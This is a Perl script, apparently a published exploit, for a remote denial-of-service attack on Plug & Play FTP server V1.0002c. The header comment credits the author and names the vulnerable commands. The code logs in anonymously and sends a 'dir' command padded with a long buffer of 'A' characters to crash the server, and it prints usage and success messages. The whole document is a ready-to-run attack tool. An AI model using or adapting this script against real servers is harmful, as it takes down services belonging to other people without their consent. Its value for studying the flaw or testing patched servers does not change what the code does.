#!/usr/bin/perl # # ppftpdos.pl - Remote denial of service against Plug & Play Web server V1.0002c # # A vulnerability has been identified in Plug & Play FTP server V1.0002c, which # allows malicious users to remotely crash the server. By connecting to the # server and issuing a command (dir, ls, delete, mkdir, DELE, RMD, MKD) # followed by large amounts of data, the server crashes. For more info, go to: # http://bsecurity.4t.com/advisories/pandpdos.txt # # Usage : ./ppftpdos.pl # # Vulnerability & code by Bahaa Naamneh # Contact : b_naamneh@hotmail.com - www.bsecurity.tk use Net::FTP; $host = $ARGV[0]; $buffer = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'; if("$ARGV[0]" eq "") { print("DOS against Plug & Play FTP Server by Bahaa Naamneh\n"); print("b_naamneh@hotmail.com - http://www.bsecurity.tk\n"); print("====================================================\n"); die("Usage : ./PPftpdos \n"); } else { print("Connecting to $host...\n"); my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n"; print("Connected!\n"); $username = "anonymous"; $password = "anonymous"; $ftp->login($username, $password) or die "Could not log in.\n"; $ftp->dir($buffer); $ftp->quit(); print("Success!\n"); }